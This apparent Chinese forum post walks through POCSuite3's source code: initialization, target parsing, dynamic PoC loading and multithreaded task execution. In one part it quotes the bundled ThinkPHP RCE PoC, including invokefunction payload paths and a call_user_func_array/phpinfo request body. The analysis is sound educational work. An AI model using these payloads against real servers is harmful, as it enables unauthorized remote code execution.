找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

3847

积分

0

好友

531

主题
发表于 3 小时前 | 查看: 5| 回复: 0

POCSuite3 是由知道创宇 404实验室开发维护的一款开源远程漏洞测试与概念验证 (PoC) 开发框架。为了深入理解其内部运行机制,本文将从源码层面,系统性解析该项目的初始化流程、多线程模型以及 PoC 模板的设计与加载等核心逻辑。

项目结构概览

pocsuite3项目目录结构

项目主要目录及文件说明:

  • api:对常用导入包进行重命名,方便后续调用。
  • data:存储用户所需的文档数据。
  • lib:项目核心代码所在。
  • modules:存储用户自定义模块。
  • plugins:存储用户自定义插件。
  • pocs:存储 PoC 脚本文件。
  • shellcodes:存储用于生成 PHP、Java、Python 等语言的利用代码,以及反弹 Shell 的利用代码。
  • cli.py:项目的主要命令行入口。
  • console.py:命令行交互界面。

入口点:cli.py 分析

程序从 /pocsuite3/cli.pymain() 函数开始执行。

def main():
    """
    @function Main function of pocsuite when running from command line.
    """
    try:
        check_environment()
        set_paths(module_path())
        banner()

        init_options(cmd_line_parser().__dict__)

        data_to_stdout("
  • starting at {0}\n\n".format(time.strftime("%X")))         init()         try:             start()         except threading.ThreadError:             raise
    • check_environment():检查当前工作环境是否符合系统要求。
    • set_paths():设置后续需要用到的数据、目录路径信息。
    • banner():打印命令行横幅。
    • init_options(cmd_line_parser().__dict__):处理命令行参数。

    命令行参数解析

    cmd_line_parser() 函数负责解析命令行参数,它使用了 Python 的 argparse 模块。

    命令行参数解析代码截图

    其中,-c 参数值得注意:

    target.add_argument("-c", dest="configFile", help="Load options from a configuration INI file")

    用户可以先在 pocsuite.ini 配置文件中预设好参数,然后通过 pocsuite -c pocsuite.ini 命令运行,这为批量或复杂测试提供了便利。

    pocsuite.ini配置文件示例

    全局变量初始化

    深入 init_options() 函数,可以看到命令行参数被存储在了几个核心的全局字典对象中。

    全局变量初始化代码

    共有五个关键全局变量贯穿整个项目生命周期:

    1. conf:存储程序运行的基本配置信息。
    2. kb:知识库,存储目标地址、已加载的 PoC、运行模式、输出结果、PoC 文件路径、多线程状态等信息。
    3. cmd_line_options:存储原始的命令行输入的参数值。
    4. merged_options:存储命令行输入值与程序默认值合并后的最终选项。
    5. paths:存储数据、插件、poc 等各类目录的地址。

    核心初始化流程:init() 函数

    参数处理完毕后,程序进入 init() 函数进行项目初始化。以下是部分关键函数的注解:

    def init():
        """
        Set attributes into both configuration and knowledge base singletons
        based upon command line and configuration file options.
        """
        set_verbosity()          # 设置日志输出级别
        _adjust_logging_formatter() # 调整日志格式器
        _cleanup_options()       # 格式化各项配置并校验合法性
        _basic_option_validation() # 校验 Seebug、ZoomEye 等 API Token 的合法性
        _create_directory()      # 检测必要文件路径是否存在,不存在则创建
        _init_kb_comparison()
        update()
        _set_multiple_targets()  # 读取并处理目标地址
        _set_user_pocs_path()
        _set_pocs_modules()      # 动态加载 PoC 脚本
        _set_plugins()           # 动态加载插件
        _init_targets_plugins()
        _init_pocs_plugins()
        _set_task_queue()        # 初始化任务队列,为多线程做准备
        _init_results_plugins()  # 初始化输出结果插件

    AttribDict 类解析

    上文提到的五个全局变量,都是 AttribDict 类的实例。这个类简化了字典的访问方式。

    AttribDict实例初始化

    AttribDict 类继承自 Python 内置的 OrderedDict,主要重写了三个特殊方法:

    class AttrDict(OrderedDict):
        """
        AttrDict extends OrderedDict to provide attribute-style access.
        Items starting with __ or _OrderedDict_ can't be accessed as attributes.
        """
        __exclude_keys__ = set()
    
        def __getattr__(self, name):
            if (name.startswith('__')
                or name.startswith('_OrderedDict_')
                or name in self.__exclude_keys__):
                return super(AttrDict, self).__getattribute__(name)

    __setattr__和__delattr__方法

    这三个方法 (__getattr__, __setattr__, __delattr__) 逻辑相似。它们首先判断属性名是否属于以下三类“例外”:

    1. 以双下划线 __ 开头(如 Python 内置属性 __dict__)。
    2. _OrderedDict_ 开头(OrderedDict 内部实现使用的名称)。
    3. 存在于 __exclude_keys__ 集合中。

    如果满足任一条件,则跳过自定义处理,直接调用父类的对应方法。否则,就将属性作为字典的键来访问、设置或删除,从而实现 obj.attr 这种类似对象属性的访问方式。

    目标地址处理逻辑

    _set_multiple_targets() 函数中,程序读取并处理用户指定的目标。

    _set_multiple_targets函数代码

    函数首先检查 conf.url 中是否存在数据。如果存在,则创建一个 set 集合用于临时存储并去重。然后遍历 conf.url 列表,对每个地址调用 parse_target() 函数进行解析。如果解析成功(返回值不为空),则将其添加到临时集合中。最后,将集合中的所有目标添加到全局变量 kb.targets 中。

    parse_target() 函数是地址解析的核心:

    def parse_target(address):
        target = None
        if is_domain_format(address) or is_url_format(address) or is_ip_address_with_port_format(address):
            target = address
        elif is_ipv6_url_format(address):
            conf.ipv6 = True
            target = address
        elif is_ip_address_format(address):
            try:
                ip = ip_address(address)
                target = ip.exploded
            except ValueError:
                pass
        else:
            ...
        return target

    parse_target函数部分代码

    其解析逻辑如下:

    1. 如果是域名、标准 URL 或 IP:端口 格式,直接赋值。
    2. 如果是 http://[IPv6] 格式,启用 IPv6 配置并赋值。
    3. 如果是纯 IPv4 或 IPv6 地址,使用 Python 内置的 ipaddress.ip_address() 方法进行标准化解析。

    判断函数如 is_domain_format() 内部主要通过正则表达式实现。

    正则表达式定义

    动态 PoC 加载机制

    _set_pocs_modules() 函数负责动态加载 PoC 脚本,这是框架灵活性的关键。

    _set_pocs_modules函数部分代码

    加载过程主要分为几个步骤:

    Step 1: 从本地 pocs 目录加载

    1. 使用 os.listdir() 读取 pocs 目录,获取文件列表。
    2. 通过 filter()lambda 函数过滤掉 __init__.py__init__.pyc 等初始化文件。
    3. 使用 os.path.splitext() 将文件名拆分为(名称,扩展名)的元组,并构建字典,便于后续查找。

    Step 2: 遍历并加载 PoC 文件
    遍历配置中指定的 PoC 列表,根据文件名和后缀名构建完整的文件路径,然后调用核心函数 load_file_to_module(file_path) 进行加载。

    Step 3: 从 Seebug 等在线平台加载 PoC(如果配置了相关选项)。

    PoC 模板设计

    所有 PoC 脚本都继承自一个基类 POCBase。以 pocsuite3/pocs 目录下的 thinkphp_rce 为例:

    ThinkPHP RCE PoC示例

    基类 POCBase__init__ 方法中预定义了一系列属性,如目标地址、请求头、URL、模式等。

    POCBase基类初始化

    PoC 执行的核心是 execute() 方法:

    def execute(self, target, headers=None, params=None, mode='verify', verbose=True):
        self.target = target
        self.url = parse_target_url(target) if self.current_protocol == POC_CATEGORY.PROTOCOL.HTTP else self.build_url()
        self.headers = headers
        self.params = str_to_dict(params) if params else {}
        self.mode = mode
        self.verbose = verbose
        self.expt = (0, 'None')
        # TODO
        output = None
        try:
            output = self._execute()

    execute方法代码

    execute() 方法会根据协议类型解析目标 URL,并调用内部的 _execute() 方法。_execute() 则根据 modeverifyattackshell)的值,分别调用子类必须实现的 _verify()_attack()_shell() 方法。

    thinkphp_rce_verify() 方法为例:

    def _verify(self):
        result = {}
        p = self._check(self.url)
        if p:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = p[0]
            result['VerifyInfo']['Postdata'] = p[1]
        return self.parse_output(result)

    _verify方法代码

    它调用了 _check() 方法进行实际的漏洞检测:

    def _check(self, url):
        flag = 'Registered PHP Streams'
        data = {
            "function": "call_user_func_array",
            "vars[0]": "phpinfo",
            "vars[1][1]": "-1"
        }
        payloads = [
            r"/?s=admin\think\app/invokefunction",
            r"/admin.php?s=admin\think\app/invokfunction",
            r"/index.php?s=think\think\app\invokefunction",
            r"/index\think\Container\invokefunction",
            r"/index.php?s=index\think\Container\invokefunction"
        ]
        for payload in payloads:
            vul_url = url + payload
            r = requests.post(vul_url, data=data)
            if flag in r.text:
                return payload, dict(data)
        return False

    _check方法代码

    _check() 方法构造特定的 Payload 发送 HTTP 请求,并根据响应内容中是否包含预定义的 flag 字符串来判断漏洞是否存在。检测结果最终会通过 parse_output() 方法格式化为 JSON 输出。

    动态加载核心:load_file_to_module()

    让我们回到 _set_pocs_modules() 中的关键调用。

    加载POC文件路径处理

    当成功构建 file_path 后,会调用 load_file_to_module(file_path)

    load_file_to_module函数

    这个函数是 Python 动态加载的核心体现:

    1. 生成模块名:例如,文件 thinkphp_rce.py 对应的模块名为 pocs_thinkphp_rce
    2. 创建模块规格(ModuleSpec):使用 importlib.util.spec_from_file_location(),并指定一个自定义的 PocLoader 作为加载器。
    3. 创建模块对象:使用 importlib.util.module_from_spec() 根据规格创建模块。
    4. 执行模块代码:调用 spec.loader.exec_module(mod),这会触发加载器的 exec_module() 方法。

    PocLoader.exec_module() 方法负责最终的代码加载与执行:

    def exec_module(self, module):
        filename = self.get_filename(self.fullname)
        poc_code = self.get_data(filename)
        self.check_requires(poc_code)
        obj = compile(poc_code, filename, 'exec', dont_inherit=True, optimize=-1)
        exec(obj, module.__dict__)

    exec_module方法代码

    这个过程包含了读取文件内容、检查依赖、将源代码编译为字节码,最后通过 exec() 函数在模块的命名空间内执行字节码,从而使模块中定义的类(如 DemoPOC)变得可用。这种设计使得 POCSuite3 能够灵活地加载外部的、用户编写的 PoC脚本,是框架可扩展性的基石。

    多线程任务执行与结果输出

    任务队列初始化

    _set_task_queue() 函数负责创建任务队列。

    def _set_task_queue():
        if kb.registered_pocs and kb.targets:
            for poc_module in kb.registered_pocs:
                for target in kb.targets:
                    kb.task_queue.put((target, poc_module))

    _set_task_queue函数代码

    如果已加载的 PoC 和目标地址都不为空,则通过双重循环,将每一个 (target, poc_module) 元组放入线程安全的队列 kb.task_queue 中,为后续的多线程扫描做好准备。

    启动扫描:start() 函数

    初始化完成后,main() 函数调用 start() 启动扫描。

    def start():
        runtime_check()
        tasks_count = kb.task_queue.qsize()
        info_msg = "pocsuite got a total of {0} tasks".format(tasks_count)
        logger.info(info_msg)
        logger.debug("pocsuite will open {} threads".format(conf.threads))
        try:
            run_threads(conf.threads, task_run)
            logger.info("Scan completed, ready to print")
        finally:
            task_done()
        ...

    start函数部分代码

    1. runtime_check():检查是否有 PoC 被成功加载。
      runtime_check函数
    2. 获取任务队列大小并记录日志。
    3. 核心调用run_threads(conf.threads, task_run),启动多线程执行 task_run 函数。
    4. finally 块中调用 task_done() 进行收尾工作。

    多线程控制器:run_threads()

    run_threads() 函数是通用的多线程启动器。

    def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
        threads = []

    run_threads函数定义

    其主要逻辑如下:

    1. 线程数检查:如果线程数不大于1,则直接执行函数;如果大于1,则记录启动信息;如果超过最大线程数限制,则发出警告。
      线程数检查代码
    2. 创建并启动线程:循环创建指定数量的线程,将目标函数设置为 exception_handled_function(内部会调用 thread_function),并设置为守护线程。
      创建并启动线程代码
    3. 等待线程结束:通过循环检查所有线程的 isAlive() 状态,直到所有线程执行完毕。
      等待线程结束代码

    结果处理与输出

    所有扫描线程结束后,执行 task_done() 函数。

    def task_done():
        show_task_result()
        result_plugins_start()
        result_compare_handle()

    task_done函数

    1. show_task_result():从 kb.results 中取出所有 PoC 执行结果,并使用 PrettyTable 进行格式化表格输出。
      show_task_result部分代码
    2. result_plugins_start():启动结果输出插件,例如生成 HTML 报告。它会调用如 file_record.py 中插件的 start() 方法。
      result_plugins_start函数
      file_record插件start方法
    3. result_compare_handle():显示来自不同搜索引擎的对比数据(如果启用了比较功能)。
      result_compare_handle函数

    线程工作函数:task_run()

    每个线程实际执行的是 task_run() 函数。

    def task_run():
        while not kb.task_queue.empty() and kb.thread_continue:
            target, poc_module = kb.task_queue.get()
            if not conf.console_mode:
                poc_module = copy.deepcopy(kb.registered_pocs[poc_module])
            poc_name = poc_module.name

    task_run函数开始部分

    1. 循环取任务:只要任务队列不为空且线程继续运行标志为真,就从队列中获取一个 (target, poc_module) 任务。
    2. 深拷贝 PoC 模块:为防止多线程修改原始 PoC 模块对象,这里使用 copy.deepcopy() 进行深拷贝。
    3. 处理用户自定义参数:检查并设置用户通过命令行传递的自定义参数,同时进行白名单保护和必选参数校验。
      处理用户自定义参数代码
    4. 执行 PoC:调用 PoC 模块的 execute() 方法进行漏洞验证或攻击,这是整个 安全测试 流程的核心动作。
      执行PoC的try-except块
    5. 处理结果:根据执行的成功或失败状态,更新结果字典,并调用插件处理结果,最后将结果追加到 kb.results 中。
      结果处理与保存代码

    总结与执行流程图

    综合以上分析,POCSuite3 的核心执行流程可以归纳如下:

    POCSuite3执行流程图

    1. 开始执行cli.py 中的 main() 函数被调用,进行环境检查和输入参数获取。
    2. 核心代码
      • 系统初始化:调用 init() 函数,完成配置加载、目标解析、PoC 与插件动态加载、任务队列初始化等。
      • 启动扫描:调用 start() 函数,通过 run_threads() 创建多线程,每个线程执行 task_run() 函数,从队列中取任务并执行具体的 PoC 模板。
    3. 输出:所有线程结束后,进行结果格式化、报告生成等输出操作。

    通过对 POCSuite3 的 源码分析,我们不仅理解了其模块化、插件化的设计思想,也深入掌握了其利用 Python 动态加载、多线程队列等机制实现高效、可扩展漏洞测试框架的具体方法。希望这篇分析能帮助你更好地使用或基于此框架进行二次开发。




    上一篇:AI加速时代,架构师如何从流程守门人转向系统秩序维护者
    下一篇:Redis分布式锁机制详解:如何应对多节点并发与资源争抢?
    您需要登录后才可以回帖 登录 | 立即注册

    手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

    GMT+8, 2026-3-5 19:12 , Processed in 0.524920 second(s), 42 queries , Gzip On.

    Powered by Discuz! X3.5

    © 2025-2026 云栈社区.

    快速回复 返回顶部 返回列表